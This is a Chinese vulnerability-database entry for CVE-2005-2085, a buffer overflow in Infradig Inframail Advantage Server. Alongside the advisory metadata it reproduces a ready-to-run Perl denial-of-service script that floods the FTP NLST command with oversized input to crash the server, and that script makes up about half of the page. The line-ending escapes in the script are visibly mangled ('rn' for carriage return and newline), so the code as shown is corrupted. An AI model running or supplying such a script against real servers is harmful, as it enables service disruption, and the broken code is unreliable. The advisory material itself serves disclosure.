infradig inframail 缓冲区溢出漏洞

infradig inframail 缓冲区溢出漏洞

漏洞ID 1108896 漏洞类型 缓冲区溢出
发布时间 2005-06-27 更新时间 2005-07-05
图片[1]-infradig inframail 缓冲区溢出漏洞-安全小百科CVE编号 CVE-2005-2085
图片[2]-infradig inframail 缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200507-029
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/1166
https://www.securityfocus.com/bid/89779
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200507-029
|漏洞详情
Inframail是一个集成了电子邮件、WWW、FTP、WebMail等多个功能的网络服务平台系统。InframailAdvantageServerEdition6.0至6.7版本中存在缓冲区溢出漏洞。远程攻击者通过超长的SMTPFROM字段或FTPNLST命令使进程崩溃,导致拒绝服务。
|漏洞EXP
#===== Start Inframail_FTPOverflow.pl =====
#
# Usage: Inframail_FTPOverflow.pl <ip>
#        Inframail_FTPOverflow.pl 127.0.0.1
#
# Infradig Systems Inframail Advantage Server Edition 6.0
# (Version: 6.37)
#
# Download:
# http://www.infradig.com/
#
#########################################################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                    PeerPort => "21",
                                    Proto    => "TCP"))
{
        print "Attempting to kill Inframail FTP server at $ARGV[0]:21...";

        sleep(1);

        print $socket "USER hellorn";

        sleep(1);

        print $socket "PASS motorn";

        sleep(1);

        print $socket "NLST " . "A" x 102400 . "rn";

        sleep(1);

        print $socket "NLST " . "A" x 102400 . "rn";

        close($socket);
}
else
{
        print "Cannot connect to $ARGV[0]:21n";
}
#===== End Inframail_FTPOverflow.pl =====

# milw0rm.com [2005-06-27]
|受影响的产品
Infradig Systems Inframail Advantage Server 6.7

Infradig Systems Inframail Advantage Server 6.0

|参考资料

来源:BUGTRAQ
名称:20050628MultiplebufferoverflowsexistinInfradigSystemsInframailAdvantageServerEdition6.0
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=111998161006731&w;=2

相关推荐: Multiple Squid Remote Code Execution Vulnerabilities

Multiple Squid Remote Code Execution Vulnerabilities 漏洞ID 1101851 漏洞类型 Unknown 发布时间 2002-07-03 更新时间 2002-07-03 CVE编号 N/A CNNVD-ID …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享